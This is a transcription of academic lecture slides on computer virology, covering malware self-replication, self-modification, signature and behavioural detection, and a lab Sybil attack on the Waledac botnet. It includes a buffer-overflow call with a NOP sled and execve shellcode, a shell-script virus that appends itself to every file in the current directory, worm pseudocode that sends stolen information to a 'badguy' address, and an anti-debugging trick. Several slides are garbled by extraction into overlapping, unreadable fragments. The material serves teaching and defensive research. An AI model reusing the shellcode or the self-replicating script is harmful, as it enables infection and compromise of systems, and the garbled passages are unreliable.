An introduction to Computer Virology - Jean-Yves Marion LORIA
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
An introduction to Computer Virology Jean-Yves Marion LORIA Université de Nancy Jean-Yves.Marion@loria.fr mardi 20 décembre 2011 1
What is a malware ? • A malware is a program which has malicious intentions • A malware is a virus, a worm, a spyware, a botnet ... • Giving a mathematical definition is difficult ✴ So how it works ? mardi 20 décembre 2011 3
How do infections by malware work ? You can’t patch stupidity Infections Social engineering Mutations Infections Vulnerabilities Bugs are un-avoidable mardi 20 décembre 2011 4
and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B. Social engineering The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far. INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: CTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS, AND FAST-FLUXING NETWORKS IX A AC Social Engineering Tactics INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: e this report was written, WALEDAC was seen to have used eight social EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS, AND FAST-FLUXING NETWORKS g attacks in an effort to make would-be victims run the malware. WALEDAC with the Christmas Ecard ploy. With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.” Figure 1. Christmas ecard spam Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president Figure 2. Timeline of WALEDAC activities Figure 6. WALEDAC rips text off from Obama’s website, Figure 2. Christmas ecard website bearing false news that he no longer wants to be the president mardi 20 décembre 2011 6
Waledac • Use of a dropper • Confickers or other malware are used to install waledac • Binaries are packed with UPX and homemade packers • Encryption technologies : RSA & AES (openSSL) • Send emails from templates • Scan files to find email addresses and password • Download binaries and update itself mardi 20 décembre 2011 7
An email template Received: from %^C0%^P%^R3-‐6^ %:qwertyuiopasdfghjklzxcvbnm^%^% ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%]) by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^% From: "%^Fmynames^% %^Fsurnames^%" User-‐Agent: Thunderbird %^Ftrunver^% To: %^0^% Subject: %^Fjuly^% http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%. %^Fjuly_link^%/^% mardi 20 décembre 2011 8
3-tier movie of an attack social engineering targeted attack a dropper client-side exploit Install malware mardi 20 décembre 2011 10
Software bugs mardi 20 décembre 2011 11
Software Bugs (client side exploit) • Data are programs • Bugs are doors if there are exploitable (0-days) • A no bug system is safe • But systems contain bugs ... and bug-free programs do not exist as a consequence of the undecidability of the halting problem (Turing) mardi 20 décembre 2011 12
Vulnerabilities : a buffer-overflow EIP \xFFF0 void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata); EBP \xE000 \x90\x90 } ... vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf ... \x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 ... \x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 buffer \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd \x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls») Stack mardi 20 décembre 2011 13
Vulnerabilities : a buffer-overflow EIP \xFFF0 void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata); EBP \xE000 \x90\x90 } ... ... \x90\x90 ... \x90\x90 return at the address FFF0 buffer Stack mardi 20 décembre 2011 14
Bugs • A buffer-overflow transforms a program in a self-modifying program Wave 1 Wave 1 Wave 2 Wave 2 is the code created by buffer overflow in wave 1 mardi 20 décembre 2011 15
cer ? (1/3) What is a malware ? nalyse binaire, c’est • Infect systems by self-replication de programme • Mutation mme est inconnu e un• Protect blob itself binaire • Obfuscation ts • Self-modification contrôle indécidable tures indirectes • Detection données indécidable • Undecidable odifiant e indécidable mardi 20 décembre 2011 16
Outline • Foundation 1 : Self-replication • Foundation 2 : Self-modification • Detection • Detection by string matching • Behavioral detection • Botnet neutralization mardi 20 décembre 2011 17
Foundation 1 : Self-Replication mardi 20 décembre 2011 18
Self-replicating Cellular automaton Von Neumann (1952), Burke Codd, Langton mardi 20 décembre 2011 19
Cohen’s formalization (1985) Cohen’s Virus (1985) Re theor foun compu v1 v2 ... vn v’1 v’2 ... v’m Viruses worms ILoveYo State o A more � Consider Turing Machine M approa � and a Viral set V Abst Vi Weak r � When a TM M reads v ∈ V , M produces v� ∈V Blueprint Strong � (M, V ) is a description of a virus External p Extend recursio fixed poly Explicit Internal p Reproduc mardi 20 décembre 2011 vectors 20
Self-Replication • A virus has self-replicating capacity • Reflexive property of programming language based on a • Pointer mechanism to program code, e.g. $0 # f o r each f i l e FName i n t h e c u r r e n t p a t h f o r FName in ∗ ; do # i f FName i s not me i f [ $FName != $0 ] ; then # add m y s e l f a t t h e end o f FName cat $0 >> $FName fi done Figure 2: An example of ecto-symbiote We see that by iterating this virus, it will make copies of itself system runs out of memory. mardi 20 décembre 2011 21
Self-Replication • Program encoding (Ken Thompson «Reflections on trusting Trust», CACM84) main() { char *s="main() { char *s=%c%s %c; printf(s,34,s,34); }"; printf(s,34,s,34);} • See also quines mardi 20 décembre 2011 22
Self-Replication • Fixed point combinators (functional programming languages) Y F = Y (Y F ) • Computability : Recursion theorem of Kleene (1938) • See book of N.D Jones for a programming point of view • See books of Rogers or P. Odifreddi for a computability point of view • See marvelous books of R. Smullyan ... mardi 20 décembre 2011 23
A compilation point of view A worm X scenario •Open an email attachment by social engineering •X scans for informations •X extracts a list of email address of targeted peoples •X sends copy of itself by email mardi 20 décembre 2011 24
Worm X specification WormX(v,out) { info := extract(out); extract information send(«badguy»,info); send information @bk := findAddress(out); find email address send(@bk,v); send worm X to @bk } How to compile Worm X ? mardi 20 décembre 2011 25
Program Semantics Semantics �P �(d) is the value of P on the environment d ∗ ∗ �_� : Programs × D → D where a value of D∗ is a system environment. From the above example �� �� �send�(spider@man.com, Hello , Out) �� �� = cons(cons(spider@man.com, Hello ), Out) Where Out is an output stream. mardi 20 décembre 2011 26
Suppose that out is a system entry point, A specification of ILoveYou is: love(v,out) { Solve a fixed point equation info := find(out); // find informations out := send(cons(‘‘badguy@dom.com’’,nil),info); @bk := extract(out); //extract addresses out := send(@bk,v); //send virus to @bk return out; } We have to solve a fixed point equation : v should behave as ILoveYou if: !W "(out) = !WormX"(W, out) W is a worm satisfying the specification WormX mardi 20 décembre 2011 27
A general solution to fixed point equations is given by Kleene’s recursion theorem Theorem (Kleene (1938)) IfIfppisis aa program, program, then then there there is a program is a program e such e that such that: !e"(x) = !p"(e, x) Proof: A solution�d(x)�(y) of IloveYou equation = �x�(x, y) �q�(y, x) = �p�(�d�(y), !v"(out) x) out) = !love"(v, Set v = ee = where d(q) p = Love. �d(q)�(x) = �q�(q, x) �d�(q) = �p�(�d�(q), x) mardi 20 décembre 2011 28
fou Suppose that out is a system entry point, comp A specification of ILoveYou is: Malware A general solution to fixedfrom love(v,out) construction { point a specification equations is given by info := find(out); // find informations Kleene Theorem out recursion (Kleene theorem: (1938)) := send(cons(‘‘badguy@dom.com’’,nil),info); If@bk Ifppisis:=aaextract(out); program, then program, then there //extract there a is a program is addresses program e such ethat such that: out := send(@bk,v); //send virus to @bk return out; !e"(x) = !p"(e, x) } A solution of IloveYou equation v should behave as ILoveYou if: Kleene fixed point is a solution of !v"(out) = !love"(v, out) !W "(out) = !WormX"(W, out) Set v = e where p = Love. We can construct a virus, which satisfies a given specification. mardi 20 décembre 2011 29
approa out := send(@bk,v); //send virus to @bk Abst Vi return out; Weak r } Self-replicating malware compiler Blueprint Strong External p v should behave as ILoveYou if: There is a compiler Comp such that W is the Extend recursio worm satisfying !W "(out) the specification out) Worm: fixed poly = !WormX"(W, Explicit Internal p Reproduc vectors Detecti !Comp"(Worm) = W Conclu !W"(out) = !Worm"(W, out) mardi 20 décembre 2011 30
Self-replication with mutations Recursion Wehistorical Some can generate factsmalware which satisfies the theorems as a foundation of specification Worm, and mutates at each computer virolo execution automatically Viruses and worms ILoveYou !e"(out) = !Worm"(Mutate(e), out) State of the art A more abstract where !1983 :Mutate is a code the first official mutation virus pn Vax-PDPprocedure 11 approach Abst Virology ! 1988 : The first worm which infects 6000 machines Weak recursion Blueprint Distributions ! The construction of e is given by Kleene’s 1990 :Dark Avenger mutation engine (Bulgaria) Strong recursion theorem. 1995 : macro virus External polymorphism ! Extended ! 2000 : Worm “I Love You” recursion fixed polymorphism ! 2001 : Palm pilot virus Explicit recursio Internal polymorphism mardi 20 décembre 2011 31
Self-replicating historicalcompiler facts with mutations: Recurs Some theorem foundati computer v There is a compiler Comp such that for all worm specification Worm and mutation !e"(out) = !Worm"(Mutate(e), out) Viruses and worms procedure Mutate : ILoveYou State of the A more abs !Comp"(Worm) = W approach !W"(out) = !Worm"(Mutate(W), out) Abst Virolo Weak recu Blueprint Distrib ! 1983 : the first official virus pn Vax-PDP 11 Strong recu External polymo ! 1988 : The first worm which infects 6000 machines Extended recursion ! 1990 :Dark Avenger mutation engine (Bulgaria) fixed polymorph Explicit rec ! 1995 : macro virus Internal polymo Reproduction th ! 2000 : Worm “I Love You” vectors Detection ! 2001 : Palm pilot virus mardi 20 décembre 2011 32
References • PhD thesis of F. Cohen • L. Adleman (1988) which coins the word «virus» • Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006) A Virus is a Virus, Lwoff mardi 20 décembre 2011 33
Foundation 2 : Self-modifications mardi 20 décembre 2011 34
A data is a code Today’s computers are built from two key principles: 1) Instructions are represented as numbers 2) Programs can be stored in memory to be read or written just as numbers (Patterson & Hennessy) mardi 20 décembre 2011 35
Applications of self-modifying programs • Malware mutations • Code protection (digital rights) • Compression and packers • Just in Time compilers mardi 20 décembre 2011 36
A simple self-modifications A simple decryption loop Wave 1 {@a,@b,@c,@d} jnz @b Wave 2 {@offset} mardi 20 décembre 2011 37
Ex: Packer UPX UPX (Packer) Hello.exe Wave 1 Wave 2 mardi 20 décembre 2011 38
Another example of self-modification Proxy = { X:= Read(); eval(X);} An external input is run An interpreter of a known or unknown language is used to execute some data mardi 20 décembre 2011 39
Analyzing self-modifying programs • Complex to design and to analyze • Program flow may change Some historical facts • Usual in semantics program and data are separated c ! Define by structural induction on P : P!σ→σ V w IL !e"(out) = !Worm"(Mutate(e), out) S A a A !Comp"(Worm) = W W !W"(out) = !Worm"(Mutate(W), out) mardi 20 décembre 2011 40 S
Dynamic analysis of self-modifying programs • Instrument a program • Monitor read R, write W memory access and memory execution X • We follow nested self-modifying • We detect some code protection • We detect code patterns • code decryption • Integrity checking • .... mardi 20 décembre 2011 41
Exemple (3/5) AC Protect • hostname packé avec ACProtect mardi 20 décembre 2011 42
Exemple Themida (4/5) • hostname packé avec Themida mardi 20 décembre 2011 43
Experiments with TraceSufer Résultats expérimentaux 1/3 TraceSurfer based • Nombre de vagues ondétectées de code Pin (Intel) sur l’ensemble des binaires ◦ max : 56 vagues 95 613 Binaries, 80% of success, 1400 binaries/h 24 / 32 Number of waves detected - max=56 mardi 20 décembre 2011 44
Related works • TraceSufer based on PIN (INTEL) • Bitblaze (Berkeley) : TEMU, VINE, ... • DynamoRio, Ether, Metasm • Data tainting related methods mardi 20 décembre 2011 45
Malware detection mardi 20 décembre 2011 46
Malware detection by string scanning • Signature is a regular expression denoting a sequence of bytes Worm.Y Your mac is now under our control ! • Signature : «Your * is now under our control Worm.Y Your PC is now under our control ! mardi 20 décembre 2011 47
Malware detection by string scanning ______________________________________________________________________________________________________ VIRUS INFORMATIQUES • Signature is a regular expression denoting a sequence of bytes • Data base of known signatures ode dynamique : l’antivirus est en fait résident et surveille Tableau 1 – M ot if viral de I-Worm .Bagle.P nence l’activité du systèm e d’exploitation, du réseau et e l’utilisateur. Il prend la m ain avant toute action et tente Taille m iner si un risque viral existe, lié à cette action. Ce m ode Signature Produit signature m and en ressources et nécessite des m achines relative- (indices) (en octets) ssantes pour ne pas être handicapant et pousser l’utilisa- rop souvent rencontré) à désactiver ce m ode au profit du Avast 8 12,916 → 12,919 . 12,937 → 12,940 ivirus m odernes, pour les plus efficaces, sont supposés AVG 14,575 533 → 536 - 538 - ... r plusieurs techniques (program m ées dans des m odules Bit Defender 8,330 0 - 1 - 60 - 128 - 129 - 134 - ... és m oteurs) afin de réduire le risque au m inim um . Elles être classées en deux groupes : Dr Web 6,169 0 - 1 - 60 - 128 - 129 - 134 - ... alyse de forme, com m uném ent appelée recherche de eTrust/Vet 1,284 0 - 1 - 60 - 128 - 129 - 134 - ... atures. Cette dernière appellation est en réalité im propre elle ne considère qu’une approche très restreinte de l’ana- eTrust/ 1,284 0 - 1 - 60 - 128 - 129 - 134 - ... de form e, laquelle regroupe de nom breuses techniques. Inoculate IT alyse de form e consiste à analyser un code vu com m e F-Secure séquence de bits ou d’octets, hors de tout contexte 59 0 - 1 - 60 - 128 - 129 - 546 - ... Worm.Bagle.P: 2005 écution. Cette analyse est fondée sur la notion de ma de détection ([9] chapitre 2) !" = { !# ,f # }, com posé G-Data 54 0 - 1 - 60 - 128 - 129 - 546 - ... m otif de détection !# (relativem ent à un code m al- KAV Pro 59 Identique à celle de F-Secure 2005 ant # ) et d’une fonction de détection f # . Il s’agit alors de ercher de différentes m anières (caractérisées par la fonc- M cAfee 12,127 8 0 - 1 - 60 - 128 - 129 - 134 - ... de détection), relativem ent à une ou plusieurs bases 2006 em ble de schém as de détection), des chaînes de bits ou NOD 32 21,849 0 - 1 - 60 - 128 - 129 - 132 - 133 - ... tets !# , à la structure plus ou m oins com plexe, réperto- s dans ces bases com m e caractéristiques d’un code m al- Norton 6 0 - 1 - 60 - 128 - 129 - 134 ant donné # ; 2005 alyse comportementale dans laquelle un fichier Panda Tit. utable est analysé dans son contexte d’exécution. Il 7,579 0 - 1 - 60 - 134 - 148 - 182 - 209... 2006 t d’une détection fonctionnelle – ce sont les m portem ents » ou les actions du code qui sont étudiées. Sophos 8,436 0 - 1 - 60 - 128 - 129 - 134 - 148... s ce contexte, la détection se fonde alors sur la notion de Trend égie de détection [9]. 88 0 - 1 - 60 - 128 - 129 - ... Office Scan tion 5 : stratégie de détection Source : Filiol tratégie de détection relativem ent à un code m alveillant Exemple : considérons la détection d’un ver récent et connu # est le triplet : comme le ver Bagle.P. La liste des différents motifs de détection est donnée dans le tableau 1 . La fonction de détection est la fonction "! = { ! mardi 20 décembre 2011 logique ET. Cela signifie que pour que le ver soit détecté, les octets 48 # , $# ,f # }
Malware detection by string scanning Pros : • Accuracy: low rate of false positive ➡ programs which are not malware are not detected • Efficient : Fast string matching algorithm ➡ Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore Cons : • Signature are quasi-manually constructed • Vulnerable to malware protections ➡ Mutations ➡ Code obfuscations mardi 20 décembre 2011 49
Detection by integrity check • Identify a file using a hash function Files Hash function Hash numbers a numerical fingerprints b • Cons : • File systems are updated, so numerical fingerprints change • Difficult to main in practice • Files may change with the same numerical fingerprint (due to hash fct) mardi 20 décembre 2011 50
Behavioral analysis Trace automata Introduction • Trace language of a program: generally undecidable. • Monitor program interactions (sys calls, network calls, ...) Trace abstraction • Behavior patterns • Approximation by a regular language: using trace collection • Abstracting by reduction or static analysis. • Detection of program behavior from execution traces • Trace automata • Regular abstraction Malicious behavior =⇒ A trace automaton is a finite state approximation of some trace detection language. • Functionalities Experiments are expressed at high level Conclusion IcmpSendEcho GetDriveType FindFirstFile FindNextFile GetLogicalDriveStrings GetDriveType FindFirstFile FindFirstFile FindNextFile FindNextFile • Information leak can be detected • Cons : • Today behavioral analysis is dynamic, which implies 12to/ 22monitor all processes, or run programs in sandboxes. • It slows down the system mardi 20 décembre 2011 51
Code protection Detection is hard because malware are protected 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks mardi 20 décembre 2011 52
Protections: Self-Modification and Obfuscation !"#$%&'(#)($*+, • A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model. - .&( &/ 01.213# /104.4#5 65# "&0#7018# 91:;#35 (& mechanism • The obfuscation 93&(#:( is("#43 modified for each new 1 distributed binary. 5(1'8138 0&8#.? EF D'91:;4'>$ CEF C34>4'1. :&8#
!"#$%&'()*(+'#,-.(/0(1-0#"'2.3#- Win32.Swizzor Packer džĂŵƉůĞ͗tŝŶϯϮ͘^ǁŝnjnjŽƌ͛ƐƉĂĐŬĞƌ 5"36#,7*(8&9&":&;&-?&":(0#"(@,''3&:(; A&&6B&> )C4C( 44 mardi 20 décembre 2011 54
Protections: Self-Modification and Obfuscation !"#$%&'(#)($*+, • A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model. - .&( &/ 01.213# /104.4#5 65# "&0#7018# 91:;#35 (& mechanism • The obfuscation 93&(#:( is("#43 modified for each new 1 distributed binary. 5(1'8138 0&8#.? EF D'91:;4'>$ CEF C34>4'1. :&8#
Code protection Detection is hard because malware are protected. Some interesting protection methods: 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks mardi 20 décembre 2011 56
Obfuscation • Function calls !"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5( 63789:&;&%(+$,
!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5( Obfuscation 63789:&;&%(+$,
Code protection 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks mardi 20 décembre 2011 59
Cryptography • The dropper of Agobot botnet mardi 20 décembre 2011 60
mardi 20 décembre 2011 61
http://quequero.org/AgoBot_Botnet_Reverse_Engineering mardi 20 décembre 2011 62
Code protection 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks mardi 20 décembre 2011 63
Self-modification • Packers ... already seen previously ... mardi 20 décembre 2011 64
Code protection 1.Obfuscation 2.Cryptography 3.Self-modification 4.Anti-analysis tricks mardi 20 décembre 2011 65
Anti-debuging tricks MOV EAX,-1 INT 2E CMP WORD PTR DS:[EDX-2],2ECD • Call interruption 2E with an invalid EAX value • Normal behavior : EDX contains the address of the next instruction • Test if EDX-2 points to the opcode of INT 2E, which is 2ECD • If a debugger is running, then EDX is equal to 0xFFFFFFFF mardi 20 décembre 2011 66
Consequences of Code protection 1. Difficult for a human analyst to understand a malware code 1. Ollydbg 2.IDA Pro mardi 20 décembre 2011 67
Welcome in Swizzorland !! ! mardi 20 décembre 2011 68
Consequences of Code protection 1. Difficult for a human analyst to understand a malware code 1. Ollydbg 2.IDA Pro 2.Difficult to design automatic tools 1.Static analysis • Abstract interpretation 2.Dynamic analysis mardi 20 décembre 2011 69
mardi 20 décembre 2011 70
A cruel world Theorem : Let v be a virus. The set of viruses which are obtained from v by mutation is not decidable (computable). A consequence of Rice theorem Theorem (RICE): Let P be a non-trivial computable property. Then the set of programs which satisfies P is not decidable. Idea of the proof : Construct a reduction from the halting problem. mardi 20 décembre 2011 71
Morphological analysis in a nutshell Signatures are abstract flow graph Detection of subgraph in program flow graph abstraction mardi 20 décembre 2011 72
Automatic construction of signatures mardi 20 décembre 2011 73
Reduction of signatures by graph rewriting mardi 20 décembre 2011 74
Morphological detection : Results • False negative • No experiment on unknown malware • Signatures with < 18 nodes are potential false negative • Restricted signatures of 20 nodes are efficient • Less than 3 sec. for signatures of 500 nodes mardi 20 décembre 2011 75
Conclusion about morphological detection • Benchmarks are good • Pro • More robust on local mutation and obfuscation • Detect easily variants of the same malware family • Try to take into account program semantics • Quasi-automatic generation of signatures • Cons • Difficult to determine flow graph statically of self-modifying programs • Use of combination of static and dynamic analysis mardi 20 décembre 2011 76
Reference • Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008. mardi 20 décembre 2011 77
Waledac, again .... • How to neutralize a botnet ? • Send the US-Marshals (see Rustock recent story) • Design an attack • Good understanding of the mechanisms of a botnet (reverse engineering) • Find an attack • Large scale experiments in vitro mardi 20 décembre 2011 78
Waledac Peer-to-peer communication protocol • Each peer maintains a list of known peer (RLIST) • Bots exchange parts of their RLIST on regular basis to maintain connectivity • Fallback mechanism over HTT¨to fetch new peers Sorted by local time Global timestamp 1244053204 Id Repeater 1 691775154c03424d9f12c17fdf4b640b ... local timestamp mardi 20 décembre 2011 79
Waledac Peer-to-peer communication protocol • Update are based on the most recent timestamps • IP address does not identify a peer • The id identifies a peer 0 • Vulnerability to sibyl attack 00000000000000000000000000000001 • Craft a RLIST update to put ... «myIP» on the top-500 list 00000000000000000000000000000500 mardi 20 décembre 2011 80
Botnet neutralization in the lab Attack scenario! 4!2(5$'%$5(*! ! "!#$$#%&'(! ! 011!('2'#$'(* !""#$%&%'(%$)# ! )! *+,-.*! /011!*2#33'(*! ! WHITE C&C! ! 13! mardi 20 décembre 2011 81
A sybil attack mardi 20 décembre 2011 82
Spam sent by the botnet mardi 20 décembre 2011 83
Rlist infections for repeaters mardi 20 décembre 2011 84
High Security Lab @ Nancy lhs.loria.fr Telescope & honeypots In vitro experiment clusters mardi 20 décembre 2011 85
Conclusions mardi 20 décembre 2011 86
Conclusion • Mathematical definitions of malware with tools • High level representation of binaries • Abstract signature which are robust w.r.t. obfuscations • Experiments theories • Analyzing tools combining static and dynamic analysis • Detection and neutralization heuristics mardi 20 décembre 2011 87
Thanks ! mardi 20 décembre 2011 88
You can also read